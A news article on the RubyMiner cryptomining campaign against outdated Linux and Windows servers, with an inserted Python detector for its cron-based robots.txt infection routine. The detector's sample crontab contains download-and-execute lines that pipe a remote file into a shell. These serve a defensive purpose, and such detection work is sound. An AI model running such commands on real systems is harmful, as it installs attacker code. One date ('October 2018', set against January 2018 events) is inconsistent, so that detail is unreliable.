Linux and Windows Servers Targeted with RubyMiner Malware

Security researchers have spotted a new strain of malware being deployed online. Named RubyMiner, this malware is a cryptocurrency miner spotted going after outdated web servers.

According to research published by Check Point and Certego, and information received by Bleeping Computer from Ixia, attacks commenced on January 9-10, last week.

Attackers target both Linux and Windows servers

Ixia security researcher Stefan Tanase told Bleeping Computer that the RubyMiner group uses a web server fingerprinting tool named p0f to scan for and identify Linux and Windows servers running outdated software.

Once they identify unpatched servers, attackers deploy well-known exploits to gain a foothold on vulnerable servers and infect them with RubyMiner.

Check Point and Ixia say they've seen attackers deploy the following exploits in the recent attack wave:

PHP php-cgi Query String Parameter Code Execution (CVE-2012-1823, CVE-2012-2311, CVE-2012-2335, CVE-2012-2336, CVE-2013-4878) [1, 2, 3, 4]

Microsoft IIS ASP Scripts Source Code Disclosure (CVE-2005-2678) [1]

It immediately stands out that RubyMiner targets both Windows and Linux systems alike.

Attackers hide malicious code in robots.txt files

In a report published last week, Check Point broke down RubyMiner's infection routine on Linux systems, based on data collected from its honeypot servers. Some things stand out right away, if only because of the attackers' creativity:

Attackers clear all cron jobs

Attackers add a new hourly cron job

The new cron job downloads a script hosted online

This script is hosted inside the robots.txt file of various domains

The script downloads and installs a modified version of the legitimate XMRig Monero miner application.
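A small detection heuristic for the cron-based routine described above, added here as an example and not code from Check Point, Ixia or the article: it scans crontab text for entries that fetch a robots.txt over HTTP and pipe it into a shell, and notes when the schedule is hourly. The crontab contents, hostname and IP address are constructed for the demonstration and are not indicators from the campaign.

```python
import re
from dataclasses import dataclass, field

# Constructed sample crontab for the demonstration; the hosts are reserved
# example/documentation addresses, not indicators from the RubyMiner campaign.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
1 * * * * wget -q -O - http://example.invalid/robots.txt | bash
*/5 * * * * curl -s http://203.0.113.10/robots.txt | sh
"""

# Hourly schedule: a fixed minute, every other time field a wildcard.
HOURLY = re.compile(r"^\s*(\d{1,2})\s+\*\s+\*\s+\*\s+\*\s+(.*)$")
# Command that fetches a robots.txt over HTTP and pipes the body into a shell.
FETCH_TO_SHELL = re.compile(r"\b(wget|curl)\b.*robots\.txt.*\|\s*(ba)?sh\b")


@dataclass
class Finding:
    line_no: int
    entry: str
    reasons: list = field(default_factory=list)


def scan_crontab(text: str) -> list:
    """Return one Finding per crontab entry matching the described routine."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank line or comment
        hourly = HOURLY.match(line)
        command = hourly.group(2) if hourly else line
        if not FETCH_TO_SHELL.search(command):
            continue  # not the download-and-execute pattern
        reasons = ["downloads robots.txt and pipes it to a shell"]
        if hourly:
            reasons.append("hourly schedule")
        findings.append(Finding(line_no, stripped, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.entry}\n  reasons: {', '.join(f.reasons)}")
```

Run it over the output of `crontab -l` for each user and over the files under /etc/cron.d; because the first step of the routine wipes existing jobs, also compare the result against a known-good baseline, since a missing legitimate entry is a signal this scanner cannot see.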

Check Point security researcher Lotem Finkelstein told Bleeping Computer that they've seen attackers target Windows IIS servers, but they have not been able to obtain a copy of the Windows version of this malware just yet.

This attack also stood out because one of the domains attackers used to hide malicious directives in the robots.txt file (lochjol[.]com) was also used in a previous malware campaign, in 2013 [1, 2].

That malware campaign also utilized the same Ruby on Rails exploit deployed in the RubyMiner attacks, suggesting the same group that was behind those attacks is most likely now attempting to spread RubyMiner.

Rising trend in Monero-mining malware

Overall, there's been a rise in attempts to spread cryptocurrency mining malware in recent months, especially malware that mines for Monero.

Two weeks into 2018 and we've already seen PyCryptoMiner targeting Linux servers and another group targeting Oracle WebLogic servers.

In most of the incidents mentioned above that targeted web servers, attackers attempted to use recent exploits, as there would be more vulnerable machines to infect.

The RubyMiner attacks are peculiar because attackers use very old exploits, which most security software would be able to detect, and which would have alerted server owners.

Finkelstein told Bleeping Computer that attackers might have been looking for abandoned machines on purpose, such as "forgotten PCs and servers with old OS versions" that sysadmins left behind and left online.

"Infecting them would ensure long periods of successful mining underneath the security radar," Finkelstein says.

RubyMiner gang infected 700 servers

Check Point put the number of servers infected with RubyMiner at around 700 and estimated the attackers' earnings at $540, based on the wallet addresses found in the custom-built XMRig miner deployed by the RubyMiner malware.

Many would argue that the group would be more successful and earn more money if they'd use more recent exploits instead of ten-year-old vulnerabilities. For example, a group that targeted Oracle WebLogic servers with an exploit from October 2018 made a whopping $226,000.

More information about the RubyMiner attacks is available in reports from Check Point and Certego.
